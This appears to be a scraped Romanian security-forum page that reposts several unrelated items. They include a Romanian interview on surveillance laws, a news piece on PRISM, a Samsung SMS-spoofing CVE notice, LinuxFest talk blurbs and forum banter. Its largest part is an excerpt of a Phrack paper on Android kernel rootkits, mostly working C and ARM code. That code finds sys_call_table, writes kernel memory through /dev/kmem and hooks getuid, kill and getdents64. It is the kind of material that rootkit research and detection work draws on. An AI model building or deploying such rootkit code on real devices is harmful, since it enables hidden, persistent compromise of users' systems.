discutii in comisii cu privire la discutarea rapoartelor - in cazul nostru, ale SRI, si au existat discutii cu privire la elaborarea unui nou pachet legislativ. Astazi (n.r. marti) asteptam o opinie a presedintelui Comisiei, dl Georgian Pop, care sa ne aduca mai multe informatii vizavi de raportarea la noua constitutie. Facem legile sigurantei in conditiile vechii constitutii, cu CSAT, cu un anumit tip de organizare, sau le facem definind beneficiarii si nevoile informationale? Sunt multe voci care spun ca daca tot facem un lucru, sa-l facem ca lumea. Nu am facut pe vechea constitutie legile sigurantei nationale si le facem acum cu un an inainte de a face noua constitutie? Si eu tind sa cred ca mai bine masuram de zece ori si sa facem o data ceva decat sa facem in fiecare an noi legi ale sigurantei, care sunt foarte importante. Reporter: Acecste legi vor include si posibilitatea ca servciile secrete sa infiinteze firme sub acoperire? S.G. M-am uitat asa, amuzat, la dezbaterea publica cu firmele infiintate sub acoperire, din ce cunosc eu cadrul legislativ, si l-am studiat bine, nu exista posibilitatea serviciilor de informatii din Romania sa infiinteze firme sub acoperire. Nu exista aceasta notiune in lege, nici nu cred ca pot prezenta Parlamentului cereri de astfel de resurse, ar fi o distorsionare majora a pietei si nu as incuraja infintarea de catre serviciile de informatii a unor firme sub acoperire. Cred ca sunt 'n'mijloace pentru a se actiona in afara tarii si in tara pentru a se aduna informatii si nu cred ca notiunea de firma sub acoperire are sens, nu cred ca poate exista intr-o societate democratica si intr-o societate care are definit conceptul de economie de piata. Nu au ce sa caute serviciile in infiintarea unor societati sub acoperire. Reporter: Daca tot vorbim de initiative legislative, aveti in vedere si modificarea legii care a majorat pragul pentru achizitiile publice? Am lucrat destul de mult, fac 17 ani de munca in aceasta chestie, achizitii publice, bugetele statului, si consider ca o flexibilizare si o crestere a pragurilor de la care se pot face achizitii directe este utila. Cu toate astea, legea prevede foarte clar felul in care se poate face acest lucru, tot trebuie sa ai trei oferte din piata. Sigur ca multi am putea suspecta ca ele se aranjeaza, ca cerem trei oferte cui credem noi si castiga cine trebuie. Dar lucrul asta este o infractiune. Curtea de Conturi, directiile fiscale, alte autoritati ale statului pot prinde oricand un primar care masluieste la 30.000 de euro o achizitie publica. Trebuie sa le dam si primarilor, directorilor de companii, prezumtia de buna credinta, trebuie sa-i si - nu sensibilizam, si nici motivam, dar sa-i responsabilizam. Noi ti-am dat 100.000 de euro pe mana sa zugravesti, varuiesti, sa angajezi un constructor, tu ai grija sa o faci bine, pentru ca vine milita. Reporter: Premierul Ponta parea nemultumit de modificarile operate in Parlament. S.G. Cred ca nu acolo a fost nemultumirea, vizavi de pragurile acestea, ci nemultumire a fost la faptul ca acele companii, Romgaz, Transgaz, Electrica, care inca au capital majoritar de stat, ar putea sa se sustraga legii achizitiilor publice. Din cum il stiu eu pe domnul prim ministru Ponta, nu va permite asa ceva. Toate companiile vor aplica OUG 34. Reporter: Si pentru ca am amintit de premierul Ponta, o parte a presei a speculat rececnt ca exista o 'racire' a relatiilor. S.G. Nu am vazut (relatarile din presa, n.r.), relatiile sunt acelasi, evident, primul ministru Ponta nu mai are timpul, rabdarea si posibiltiatea sa se raporteze la vechile relatii la fel cum se raporta pana acum. Asa ca in mod evident are alte responsabilitati in societate, si eu m-as bucura sa-si vada de ele, nu sa stea toata ziua la bere cu prietenii sau la distractii, Asa ca mi-as dori foarte mult sa reuseasca tot ce si-a propus. Si ecihpa lui, din care fac si eu parte, eu mi-as dori sa reuseasca cat mai multe, nu m-ar deranja absolut deloc o racire a relatiilor, sper ca timpul pe care nu-l mai aloca prietenilor si familiei si distractiei sa-l aloce cat mai bine treburilor guvernamentale. Cel putin chestiunea vizitelor externe si relatiilor externe si dezghetarea lor suntem toti mandri si incantati, nu credeam vreodata ca in sase luni de zile dl prim ministru va putea sa alerge atat de tare si de mult si sa si obtina atatea vizite importante la nivel inalt. Sursa: Interviu HotNews.ro: Sebastian Ghita, deputat PSD -Vom depune o initiativa legislativa care sa permita interceptarea cartelelor telefonice pre-platite. Serviciile secrete trebuie sa dispuna de instrumente de tipul PRISM pentru supravegherea internetu MUIE! Si uite ca asa poate ma apuc si eu de un proiect, o idee mai veche...

US orders release of justification for spying Court tells government to publish legal basis for Prism programme's warrantless monitoring of millions of communications Last Modified: 17 Jul 2013 01:35 [TABLE=width: 100%] [TR] [TD=class: DetailedSummary]A US court has ordered the Obama administration to declassify a 2008 court decision justifying the Prism spying programme revealed last month by whistleblower Edward Snowden. The ruling, issued earlier this week, will show how the state has legally justified its covert data collection programmes under the Foreign Intelligence Surveillance Act. Judge Reggie Walton of the Foreign Intelligence Surveillance Court issued the ruling to declassify the decision. The government is expected to decide by August 26 which parts of the 2008 decision may be published. The scope and scale of Prism, which collects millions of private foreign communications with American citizens, was leaked to the media last month by Snowden. Its operation is overseen by the FIS Court and its appeals body, the FIS Court of Review. The ruling to declassify comes after a challenge by the internet firm, Yahoo, on the constitutionality of the programme. It and a number of internet firms including Facebook, Google, AOL and Microsoft, were compelled to provide information to the National Security Agency (NSA), which runs Prism. A statement from Yahoo on Tuesday said that it was "very pleased" with the court's ruling. "Once those documents are made public, we believe they will contribute constructively to the ongoing public discussion around online privacy," Yahoo said. NSA sued Meanwhile, 19 organisations represented by the Electronic Frontier Foundation (EFF) has filed a suit against the NSA for violating their right of association by illegally collecting their call records. The coalition includes Unitarian church group, gun ownership advocates, and a broad coalition of membership and political advocacy groups. "The First Amendment protects the freedom to associate and express political views as a group, but the NSA's mass, untargeted collection of Americans' phone records violates that right by giving the government a dramatically detailed picture into our associational ties," Cindy Cohn, the legal director for the EFF, said. "Who we call, how often we call them, and how long we speak shows the government what groups we belong to or associate with, which political issues concern us, and our religious affiliation. "Exposing this information – especially in a massive, untargeted way over a long period of time – violates the Constitution and the basic First Amendment tests that have been in place for over 50 years." Data requests Meanwhile a number of major US Internet companies, including Microsoft, Google and Facebook have asked the government for permission to disclose the number of national security-related user data requests they receive. Also on Tuesday, Microsoft published an lengthy letter to US Attorney General Eric Holder asking for greater freedom to publicly discuss how it turns over user information to the government. The letter was a response to a The Guardian newspaper report that said Microsoft had given authorities the ability to circumvent encryption of Outlook emails and to capture Skype online chats. The company says that report is inaccurate. [/TD] [/TR] [TR] [TD=class: Tmp_hSpace10][/TD] [/TR] [TR=class: SourceBarTitle] [TD] Source: Agencies [/TD] [/TR] [/TABLE] Sursa: US orders release of justification for spying - Americas - Al Jazeera English

Samsung Galaxy S3/S4 SMS Spoofing Authored by Z.X. The Samsung Galaxy S3 and S4 phones come with a pre-loaded application that allows for spoofing and creation of arbitrary SMS content. Hi list, I would like to inform you that the details of the vulnerability in built-in system app of Samsung Galaxy S3/S4 (assigned as CVE-2013-4763 and CVE-2013-4764) are now disclosed to public. In Samsung Galaxy S3/S4, a pre-loaded app, i.e., sCloudBackupProvider.apk, is used to provide backup functionality for the users, and it unintentially exposes several unprotected components. By exploiting these unprotected components, an unprivileged app can trigger a so-called “restore” operation to write SMS messages back to the standard SMS database file (mmssms.db) used by the system messaging app, i.e., SecMms.apk. As a result, a smishing attack can effectively create and inject arbitrary (fake) SMS text messages. Similarly, fake MMS messages and call logs are also possible. This vulnerability has been disclosed in CVE-2013-4763. Also, these components can be sequentially triggered in a specific order to create arbitrary SMS content, inject to system-wide SMS database, and then trigger the built-in SMS-sending behavior (to arbitrary destination). This vulnerability has been disclosed in CVE-2013-4764. QIHU Inc. discovered these vulnerability and informed Samsung Corp. in June 10, 2013. Samsung confirmed the vulerability and is now preparing an OTA update. As a temporary workaround, disable the sCloudBackupProvider.apk app would help block known attack vectors. Details of CVE-2013-4763 and CVE-2013-4764 can be also found in QIHU Inc.'s official site: http://shouji.360.cn/securityReportlist/CVE-2013-4763.html http://shouji.360.cn/securityReportlist/CVE-2013-4764.html Regards, Z.X. from QIHU Inc. Sursa: Samsung Galaxy S3/S4 SMS Spoofing ? Packet Storm

Selinux For Dummies Description: SELinux For Dummies - LinuxFest Northwest 2013 Presentation by Gary Smith, Information System Security Officer, Molecular Science Computing, Pacific Northwest National Laboratory, Richland, WA. In the beginning, the Unix file system's Discretionary Access Control (DAC) security model was simple and elegant. For decades, it was good enough for most situations but as as increasing security demands were put on DAC, it began to run out of steam. Security Enhanced Linux (SELinux) was created by the National Security Agency (NSA) to be the most mature and complete response to the need for more secure Linux systems. Even though many distributions come with SELinux enabled by default, many system administrators disable SELinux out of fear their applications won't run. This is no longer acceptable. Today everything from cell phones to super computers need high quality security. Imagine being able to sandbox applications such as your web browser, email client, or even a virtual machine. The traditional Linux security make this difficult or next to impossible. SELinux, however, makes this fine grain security available to everyone. When it first arrived, SELinux seemed harder to learn and more mysterious than Quantum Mechanics. As a result, system administrators feared it. It's time to lay fear aside. SELinux for Dummies will show you what SELinux is, why it's a great addition to the security arsenal, and how to maintain and troubleshoot it. For More Information Please Visit : - linuxfestnorthwest.org Sursa: Selinux For Dummies

The Linux Audit Framework Description: The Linux Audit Framework - LinuxFest Northwest 2013 Presentation by Gary Smith, Information System Security Officer, Molecular Science Computing, EMSL, Pacific Northwest National Laboratory, Richland, WA. The Linux audit framework as shipped with many Linux distributions system provides a framework that reliably collects information about any security-relevant events. The audit records can be examined to determine whether any violation of the security policies has been committed, and by whom. Linux audit helps make your system more secure by providing you with a means to analyze what is happening on your system in great detail. It does not, however, provide additional security itself—it does not protect your system from code malfunctions or any kind of exploits. Instead, Audit is useful for tracking these issues and helps you take additional security measures to prevent them. This session provides a basic understanding of how audit works, how it can be set up, and how to use various utilities to display, query and archive the audit trail and how Linux Audit can be part of any overall Defense in Depth strategy. Sursa: The Linux Audit Framework

Da, merge pe ideea "e jucaria mea si fac ce vreau cu ea", e comunist... Chiar imi place omu asta!

Bun, se muta la gunoi si se astepta un raspuns de la autor, inainte de a primi ban pentru deficit grav de neuroni.

Android platform based linux kernel rootkit ==Phrack Inc.== Volume 0x0e, Issue 0x44, Phile #0x06 of 0x13 |=-----------------------------------------------------------------------=| |=-----------=[ Android platform based linux kernel rootkit ]=-----------=| |=-----------------------------------------------------------------------=| |=-----------------=[ dong-hoon you <x82@inetcop.org> ]=-----------------=| |=------------------------=[ April 04th 2011 ]=--------------------------=| |=-----------------------------------------------------------------------=| --[ Contents 1 - Introduction 2 - Basic techniques for hooking 2.1 - Searching sys_call_table 2.2 - Identifying sys_call_table size 2.3 - Getting over the problem of structure size in kernel versions 2.4 - Treating version magic 3 - sys_call_table hooking through /dev/kmem access technique 4 - modifying sys_call_table handle code in vector_swi handler routine 5 - exception vector table modifying hooking techniques 5.1 - exception vector table 5.2 - Hooking techniques changing vector_swi handler 5.3 - Hooking techniques changing branch instruction offset 6 - Conclusion 7 - References 8 - Appendix: earthworm.tgz.uu --[ 1 - Introduction This paper covers rootkit techniques that can be used in linux kernel based on Android platform using ARM(Advanced RISC Machine) process. All the tests in this paper were performed in Motoroi XT720 model(2.6.29-omap1 kernel) and Galaxy S SHW-M110S model(2.6.32.9 kernel). Note that some contents may not apply to all smart platform machines and there are some bugs you can modify. We have seen various linux kernel hooking techniques of some pioneers([1] [2][3][4][5]). Especially, I appreciate to Silvio Cesare and sd who introduced and developed the /dev/kmem technique. Read the references for more information. In this paper, we are going to discuss a few hooking techniques. 1. Simple and traditional hooking technique using kmem device. 2. Traditional hooking technique changing sys_call_table offset in vector_swi handler. 3. Two newly developed hooking techniques changing interrupt service routine handler in exception vector table. The main concepts of the techniques mentioned in this paper are 'smart' and 'simple'. This is because this paper focuses on hooking through modifying the least kernel memory and by the simplest way. As the past good techniques were, hooking must be possible freely before and after system call. This paper consists of eight parts and I tried to supply various examples for readers' convenience by putting abundant appendices. The example codes are written for ARM architecture, but if you modify some parts, you can use them in the environment of ia32 architecture and even in the environment that doesn't support LKM. --[ 2 - Basic techniques for hooking sys_call_table is a table which stores the addresses of low-level system routines. Most of classical hooking techniques interrupt the sys_call_table for some purposes. Because of this, some protection techniques such as hiding symbol and moving to the field of read-only have been adapted to protect sys_call_table from attackers. These protections, however, can be easily removed if an attacker uses kmem device access technique. To discuss other techniques making protection useless is beyond the purpose of this paper. --[ 2.1 - Searching sys_call_table If sys_call_table symbol is not exported and there is no sys_call_table information in kallsyms file which contains kernel symbol table information, it will be difficult to get the sys_call_table address that varies on each version of platform kernel. So, we need to research the way to get the address of sys_call_table without symbol table information. You can find the similar techniques in the web[10], but apart from this, this paper is written to meet the Android platform on the way of testing. --[ 2.1.1 - Getting sys_call_table address in vector_swi handler At first, I will introduce the first two ways to get sys_call_table address The code I will introduce here is written dependently in the interrupt implementation of ARM process. Generally, in the case of ARM process, when interrupt or exception happens, it branches to the exception vector table. In that exception vector table, there are exception hander addresses that match each exception handler routines. The kernel of present Android platform uses high vector (0xffff0000) and at the point of 0xffff0008, offset by 0x08, there is a 4 byte instruction to branch to the software interrupt handler. When the instruction runs, the address of the software interrupt handler stored in the address 0xffff0420, offset by 0x420, is called. See the section 5.1 for more information. void get_sys_call_table(){ void *swi_addr=(long *)0xffff0008; unsigned long offset=0; unsigned long *vector_swi_addr=0; unsigned long sys_call_table=0; offset=((*(long *)swi_addr)&0xfff)+8; vector_swi_addr=*(unsigned long *)(swi_addr+offset); while(vector_swi_addr++){ if(((*(unsigned long *)vector_swi_addr)& 0xfffff000)==0xe28f8000){ offset=((*(unsigned long *)vector_swi_addr)& 0xfff)+8; sys_call_table=(void *)vector_swi_addr+offset; break; } } return; } At first, this code gets the address of vector_swi routine(software interrupt process exception handler) in the exception vector table of high vector and then, gets the address of a code that handles the sys_call_table address. The followings are some parts of vector_swi handler code. 000000c0 <vector_swi>: c0: e24dd048 sub sp, sp, #72 ; 0x48 (S_FRAME_SIZE) c4: e88d1fff stmia sp, {r0 - r12} ; Calling r0 - r12 c8: e28d803c add r8, sp, #60 ; 0x3c (S_PC) cc: e9486000 stmdb r8, {sp, lr}^ ; Calling sp, lr d0: e14f8000 mrs r8, SPSR ; called from non-FIQ mode, so ok. d4: e58de03c str lr, [sp, #60] ; Save calling PC d8: e58d8040 str r8, [sp, #64] ; Save CPSR dc: e58d0044 str r0, [sp, #68] ; Save OLD_R0 e0: e3a0b000 mov fp, #0 ; 0x0 ; zero fp e4: e3180020 tst r8, #32 ; 0x20 ; this is SPSR from save_user_regs e8: 12877609 addne r7, r7, #9437184; put OS number in ec: 051e7004 ldreq r7, [lr, #-4] f0: e59fc0a8 ldr ip, [pc, #168] ; 1a0 <__cr_alignment> f4: e59cc000 ldr ip, [ip] f8: ee01cf10 mcr 15, 0, ip, cr1, cr0, {0} ; update control register fc: e321f013 msr CPSR_c, #19 ; 0x13 enable_irq 100: e1a096ad mov r9, sp, lsr #13 ; get_thread_info tsk 104: e1a09689 mov r9, r9, lsl #13 [*]108: e28f8094 add r8, pc, #148 ; load syscall table pointer 10c: e599c000 ldr ip, [r9] ; check for syscall tracing The asterisk part is the code of sys_call_table. This code notifies the start of sys_call_table at the appointed offset from the present pc address. So, we can get the offset value to figure out the position of sys_call_table if we can find opcode pattern corresponding to "add r8, pc" instruction. opcode: 0xe28f8??? if(((*(unsigned long *)vector_swi_addr)&0xfffff000)==0xe28f8000){ offset=((*(unsigned long *)vector_swi_addr)&0xfff)+8; sys_call_table=(void *)vector_swi_addr+offset; break; From this, we can get the address of sys_call_table handled in vector_swi handler routine. And there is an easier way to do this. --[ 2.1.2 - Finding sys_call_table addr through sys_close addr searching The second way to get the address of sys_call_table is simpler than the way introduced in 2.1.1. This way is to find the address by using the fact that sys_close address, with open symbol, is in 0x6 offset from the starting point of sys_call_table. ... the same vector_swi address searching routine parts omitted ... while(vector_swi_addr++){ if(*(unsigned long *)vector_swi_addr==&sys_close){ sys_call_table=(void *)vector_swi_addr-(6*4); break; } } } By using the fact that sys_call_table resides after vector_swi handler address, we can search the sys_close which is appointed as the sixth system call of sys_table_call. fs/open.c: EXPORT_SYMBOL(sys_close); ... call.S: /* 0 */ CALL(sys_restart_syscall) CALL(sys_exit) CALL(sys_fork_wrapper) CALL(sys_read) CALL(sys_write) /* 5 */ CALL(sys_open) CALL(sys_close) This searching way has a technical disadvantage that we must get the sys_close kernel symbol address beforehand if it's implemented in user mode. --[ 2.2 - Identifying sys_call_table size The hooking technique which will be introduced in section 4 changes the sys_call_table handle code within vector_swi handler. It generates the copy of the existing sys_call_table in the heap memory. Because the size of sys_call_table varies in each platform kernel version, we need a precise size of sys_call_table to generate a copy. ... the same vector_swi address searching routine parts omitted ... while(vector_swi_addr++){ if(((*(unsigned long *)vector_swi_addr)& 0xffff0000)==0xe3570000){ i=0x10-(((*(unsigned long *)vector_swi_addr)& 0xff00)>>8); size=((*(unsigned long *)vector_swi_addr)& 0xff)<<(2*i); break; } } } This code searches code which controls the size of sys_call_table within vector_swi routine and then gets the value, the size of sys_call_table. The following code determines the size of sys_call_table, and it makes a part of a function that calls system call saved in sys_call_table. 118: e92d0030 stmdb sp!, {r4, r5} ; push fifth and sixth args 11c: e31c0c01 tst ip, #256 ; are we tracing syscalls? 120: 1a000008 bne 148 <__sys_trace> [*]124: e3570f5b cmp r7, #364 ; check upper syscall limit 128: e24fee13 sub lr, pc, #304 ; return address 12c: 3798f107 ldrcc pc, [r8, r7, lsl #2] ; call sys_* routine The asterisk part compares the size of sys_call_table. This code checks if the r7 register value which contains system call number is bigger than syscall limit. So, if we search opcode pattern(0xe357????) corresponding to "cmp r7", we can get the exact size of sys_call_table. For your information, all of the offset values can be obtained by using ARM architecture operand counting method. --[ 2.3 - Getting over the problem of structure size in kernel versions Even if you are using the same version of kernels, the size of structure varies according to the compile environments and config options. Thus, if we use a wrong structure with a wrong size, it is not likely to work as we expect. To prevent errors caused by the difference of structure offset and to enable our code to work in various kernel environments, we need to build a function which gets the offset needed from the structure. void find_offset(void){ unsigned char *init_task_ptr=(char *)&init_task; int offset=0,i; char *ptr=0; /* getting the position of comm offset within task_struct structure */ for(i=0;i<0x600;i++){ if(init_task_ptr[i]=='s'&&init_task_ptr[i+1]=='w'&& init_task_ptr[i+2]=='a'&&init_task_ptr[i+3]=='p'&& init_task_ptr[i+4]=='p'&&init_task_ptr[i+5]=='e'&& init_task_ptr[i+6]=='r'){ comm_offset=i; break; } } /* getting the position of tasks.next offset within task_struct structure */ init_task_ptr+=0x50; for(i=0x50;i<0x300;i+=4,init_task_ptr+=4){ offset=*(long *)init_task_ptr; if(offset&&offset>0xc0000000){ offset-=i; offset+=comm_offset; if(strcmp((char *)offset,"init")){ continue; } else { next_offset=i; /* getting the position of parent offset within task_struct structure */ for(;i<0x300;i+=4,init_task_ptr+=4){ offset=*(long *)init_task_ptr; if(offset&&offset>0xc0000000){ offset+=comm_offset; if(strcmp ((char *)offset,"swapper")) { continue; } else { parent_offset=i+4; break; } } } break; } } } /* getting the position of cred offset within task_struct structure */ init_task_ptr=(char *)&init_task; init_task_ptr+=comm_offset; for(i=0;i<0x50;i+=4,init_task_ptr-=4){ offset=*(long *)init_task_ptr; if(offset&&offset>0xc0000000&&offset<0xd0000000&& offset==*(long *)(init_task_ptr-4)){ ptr=(char *)offset; if(*(long *)&ptr[4]==0&& *(long *)&ptr[8]==0&& *(long *)&ptr[12]==0&& *(long *)&ptr[16]==0&& *(long *)&ptr[20]==0&& *(long *)&ptr[24]==0&& *(long *)&ptr[28]==0&& *(long *)&ptr[32]==0){ cred_offset=i; break; } } } /* getting the position of pid offset within task_struct structure */ pid_offset=parent_offset-0xc; return; } This code gets the information of PCB(process control block) using some features that can be used as patterns of task_struct structure. First, we need to search init_task for the process name "swapper" to find out address of "comm" variable within task_struct structure created before init process. Then, we search for "next" pointer from "tasks" which is a linked list of process structure. Finally, we use "comm" variable to figure out whether the process has a name of "init". If it does, we get the offset address of "next" pointer. include/linux/sched.h: struct task_struct { ... struct list_head tasks; ... pid_t pid; ... struct task_struct *real_parent; /* real parent process */ struct task_struct *parent; /* recipient of SIGCHLD, wait4() reports */ ... const struct cred *real_cred; /* objective and real subjective task * credentials (COW) */ const struct cred *cred; /* effective (overridable) subjective task */ struct mutex cred_exec_mutex; /* execve vs ptrace cred calculation mutex */ char comm[TASK_COMM_LEN]; /* executable name ... */ After this, we get the parent pointer by checking some pointers. And if this is a right parent pointer, it has the name of previous task(init_task) process, swapper. The reason we search the address of parent pointer is to get the offset of pid variable by using a parent offset as a base point. To get the position of cred structure pointer related with task privilege, we perform backward search from the point of comm variable and check if the id of each user is 0. --[ 2.4 - Treating version magic Check the whitepaper[11] of Christian Papathanasiou and Nicholas J. Percoco in Defcon 18. The paper introduces the way of treating version magic by modifying the header of utsrelease.h when we compile LKM rootkit module. In fact, I have used a tool which overwrites the vermagic value of compiled kernel module binary directly before they presented. --[ 3 - sys_call_table hooking through /dev/kmem access technique I hope you take this section as a warming-up. If you want to know more detailed background knowledge about /dev/kmem access technique, check the "Run-time kernel patching" by Silvio and "Linux on-the-fly kernel patching without LKM" by sd. At least until now, the root privilege of access to /dev/kmem device within linux kernel in Android platform is allowed. So, it is possible to move through lseek() and to read through read(). Newly written /dev/kmem access routines are as follows. #define MAP_SIZE 4096UL #define MAP_MASK (MAP_SIZE - 1) int kmem; /* read data from kmem */ void read_kmem(unsigned char *m,unsigned off,int sz) { int i; void *buf,*v_addr; if((buf=mmap(0,MAP_SIZE*2,PROT_READ|PROT_WRITE, MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){ perror("read: mmap error"); exit(0); } for(i=0;i<sz;i++){ v_addr=buf+(off&MAP_MASK)+i; m[i]=*((unsigned char *)v_addr); } if(munmap(buf,MAP_SIZE*2)==-1){ perror("read: munmap error"); exit(0); } return; } /* write data to kmem */ void write_kmem(unsigned char *m,unsigned off,int sz) { int i; void *buf,*v_addr; if((buf=mmap(0,MAP_SIZE*2,PROT_READ|PROT_WRITE, MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){ perror("write: mmap error"); exit(0); } for(i=0;i<sz;i++){ v_addr=buf+(off&MAP_MASK)+i; *((unsigned char *)v_addr)=m[i]; } if(munmap(buf,MAP_SIZE*2)==-1){ perror("write: munmap error"); exit(0); } return; } This code makes the kernel memory address we want shared with user memory area as much as the size of two pages and then we can read and write the kernel by reading and writing on the shared memory. Even though the searched sys_call_table is allocated in read-only area, we can simply modify the contents of sys_call_table through /dev/kmem access technique. The example of hooking through sys_call_table modification is as follows. kmem=open("/dev/kmem",O_RDWR|O_SYNC); if(kmem<0){ return 1; } ... if(c=='I'||c=='i'){ /* install */ addr_ptr=(char *)get_kernel_symbol("hacked_getuid"); write_kmem((char *)&addr_ptr,addr+__NR_GETUID*4,4); addr_ptr=(char *)get_kernel_symbol("hacked_writev"); write_kmem((char *)&addr_ptr,addr+__NR_WRITEV*4,4); addr_ptr=(char *)get_kernel_symbol("hacked_kill"); write_kmem((char *)&addr_ptr,addr+__NR_KILL*4,4); addr_ptr=(char *)get_kernel_symbol("hacked_getdents64"); write_kmem((char *)&addr_ptr,addr+__NR_GETDENTS64*4,4); } else if(c=='U'||c=='u'){ /* uninstall */ ... } close(kmem); The attack code can be compiled in the mode of LKM module and general ELF32 executable file format. --[ 4 - modifying sys_call_table handle code in vector_swi handler routine The techniques introduced in section 3 are easily detected by rootkit detection tools. So, some pioneers have researched the ways which modify some parts of exception handler function processing software interrupt. The technique introduced in this section generates a copy version of sys_call_table in kernel heap memory without modifying the sys_call_table directly. static void *hacked_sys_call_table[500]; static void **sys_call_table; int sys_call_table_size; ... int init_module(void){ ... get_sys_call_table(); // position and size of sys_call_table memcpy(hacked_sys_call_table,sys_call_table,sys_call_table_size*4); After generating this copy version, we have to modify some parts of sys_call_table processed within vector_swi handler routine. It is because sys_call_table is handled as a offset, not an address. It is a feature that separates ARM architecture from ia32 architecture. code before compile: ENTRY(vector_swi) ... get_thread_info tsk adr tbl, sys_call_table ; load syscall table pointer ~~~~~~~~~~~~~~~~~~~~~~~~~~~ -> code of sys_call_table ldr ip, [tsk, #TI_FLAGS] ; @ check for syscall tracing code after compile: 000000c0 <vector_swi>: ... 100: e1a096ad mov r9, sp, lsr #13 ; get_thread_info tsk 104: e1a09689 mov r9, r9, lsl #13 [*]108: e28f8094 add r8, pc, #148 ; load syscall table pointer ~~~~~~~~~~~~~~~~~~~~ +-> deal sys_call_table as relative offset 10c: e599c000 ldr ip, [r9] ; check for syscall tracing So, I contrived a hooking technique modifying "add r8, pc, #offset" code itself like this. before modifying: e28f80?? add r8, pc, #?? after modifying: e59f80?? ldr r8, [pc, #??] These instructions get the address of sys_call_table at the specified offset from the present pc address and then store it in r8 register. As a result, the address of sys_call_table is stored in r8 register. Now, we have to make a separated space to store the address of sys_call_table copy near the processing routine. After some consideration, I decided to overwrite nop code of other function's epilogue near vector_swi handler. 00000174 <__sys_trace_return>: 174: e5ad0008 str r0, [sp, #8]! 178: e1a02007 mov r2, r7 17c: e1a0100d mov r1, sp 180: e3a00001 mov r0, #1 ; 0x1 184: ebfffffe bl 0 <syscall_trace> 188: eaffffb1 b 54 <ret_to_user> [*]18c: e320f000 nop {0} ~~~~~~~~ -> position to overwrite the copy of sys_call_table 190: e320f000 nop {0} ... 000001a0 <__cr_alignment>: 1a0: 00000000 .... 000001a4 <sys_call_table>: Now, if we count the offset from the address of sys_call_table to the address overwritten with the address of sys_call_table copy and then modify code, we can use the table we copied whenever system call is called. The hooking code modifying some parts of vector_swi handling routine and nop code near the address of sys_call_table is as follows: void install_hooker(){ void *swi_addr=(long *)0xffff0008; unsigned long offset=0; unsigned long *vector_swi_addr=0,*ptr; unsigned char buf[MAP_SIZE+1]; unsigned long modify_addr1=0; unsigned long modify_addr2=0; unsigned long addr=0; char *addr_ptr; offset=((*(long *)swi_addr)&0xfff)+8; vector_swi_addr=*(unsigned long *)(swi_addr+offset); memset((char *)buf,0,sizeof(buf)); read_kmem(buf,(long)vector_swi_addr,MAP_SIZE); ptr=(unsigned long *)buf; /* get the address of ldr that handles sys_call_table */ while(ptr){ if(((*(unsigned long *)ptr)&0xfffff000)==0xe28f8000){ modify_addr1=(unsigned long)vector_swi_addr; break; } ptr++; vector_swi_addr++; } /* get the address of nop that will be overwritten */ while(ptr){ if(*(unsigned long *)ptr==0xe320f000){ modify_addr2=(unsigned long)vector_swi_addr; break; } ptr++; vector_swi_addr++; } /* overwrite nop with hacked_sys_call_table */ addr_ptr=(char *)get_kernel_symbol("hacked_sys_call_table"); write_kmem((char *)&addr_ptr,modify_addr2,4); /* calculate fake table offset */ offset=modify_addr2-modify_addr1-8; /* change sys_call_table offset into fake table offset */ addr=0xe59f8000+offset; /* ldr r8, [pc, #offset] */ addr_ptr=(char *)addr; write_kmem((char *)&addr_ptr,modify_addr1,4); return; } This code gets the address of the code that handles sys_call_table within vector_swi handler routine, and then finds nop code around and stores the address of hacked_sys_call_table which is a copy version of sys_call_table. After this, we get the sys_call_table handle code from the offset in which hacked_sys_call_table resides and then hooking starts. --[ 5 - exception vector table modifying hooking techniques This section discusses two hooking techniques, one is the hooking technique which changes the address of software interrupt exception handler routine within exception vector table and the other is the technique which changes the offset of code branching to vector_swi handler. The purpose of these two techniques is to implement the hooking technique that modifies only exception vector table without changing sys_call_table and vector_swi handler. --[ 5.1 - exception vector table Exception vector table contains the address of various exception handler routines, branch code array and processing codes to call the exception handler routine. These are declared in entry-armv.S, copied to the point of the high vector(0xffff0000) by early_trap_init() routine within traps.c code, and make one exception vector table. traps.c: void __init early_trap_init(void) { unsigned long vectors = CONFIG_VECTORS_BASE; /* 0xffff0000 */ extern char __stubs_start[], __stubs_end[]; extern char __vectors_start[], __vectors_end[]; extern char __kuser_helper_start[], __kuser_helper_end[]; int kuser_sz = __kuser_helper_end - __kuser_helper_start; /* * Copy the vectors, stubs and kuser helpers (in entry-armv.S) * into the vector page, mapped at 0xffff0000, and ensure these * are visible to the instruction stream. */ memcpy((void *)vectors, __vectors_start, __vectors_end - __vectors_start); memcpy((void *)vectors + 0x200, __stubs_start, __stubs_end - __stubs_start); After the processing codes are copied in order by early_trap_init() routine, the exception vector table is initialized, then one exception vector table is made as follows. # ./coelacanth -e [000] ffff0000: ef9f0000 [Reset] ; svc 0x9f0000 branch code array [004] ffff0004: ea0000dd [Undef] ; b 0x380 [008] ffff0008: e59ff410 [SWI] ; ldr pc, [pc, #1040] ; 0x420 [00c] ffff000c: ea0000bb [Abort-perfetch] ; b 0x300 [010] ffff0010: ea00009a [Abort-data] ; b 0x280 [014] ffff0014: ea0000fa [Reserved] ; b 0x404 [018] ffff0018: ea000078 [IRQ] ; b 0x608 [01c] ffff001c: ea0000f7 [FIQ] ; b 0x400 [020] Reserved ... skip ... [22c] ffff022c: c003dbc0 [__irq_usr] ; exception handler routine addr array [230] ffff0230: c003d920 [__irq_invalid] [234] ffff0234: c003d920 [__irq_invalid] [238] ffff0238: c003d9c0 [__irq_svc] [23c] ffff023c: c003d920 [__irq_invalid] ... [420] ffff0420: c003df40 [vector_swi] When software interrupt occurs, 4 byte instruction at 0xffff0008 is executed. The code copies the present pc to the address of exception handler and then branches. In other words, it branches to the vector_swi handler routine at 0x420 of exception vector table. --[ 5.2 - Hooking techniques changing vector_swi handler The hooking technique changing the vector_swi handler is the first one that will be introduced. It changes the address of exception handler routine that processes software interrupt within exception vector table and calls the vector_swi handler routine forged by an attacker. 1. Generate the copy version of sys_call_table in kernel heap and then change the address of routine as aforementioned. 2. Copy not all vector_swi handler routine but the code before handling sys_call_table to kernel heap for simple hooking. 3. Fill the values with right values for the copied fake vector_swi handler routine to act normally and change the code to call the address of sys_call_table copy version. (generated in step 1) 4. Jump to the next position of sys_call_table handle code of original vector_swi handler routine. 5. Change the address of vector_swi handler routine of exception vector table to the address of fake vector_swi handler code. The completed fake vector_swi handler has a code like following. 00000000 <new_vector_swi>: 00: e24dd048 sub sp, sp, #72 ; 0x48 04: e88d1fff stmia sp, {r0 - r12} 08: e28d803c add r8, sp, #60 ; 0x3c 0c: e9486000 stmdb 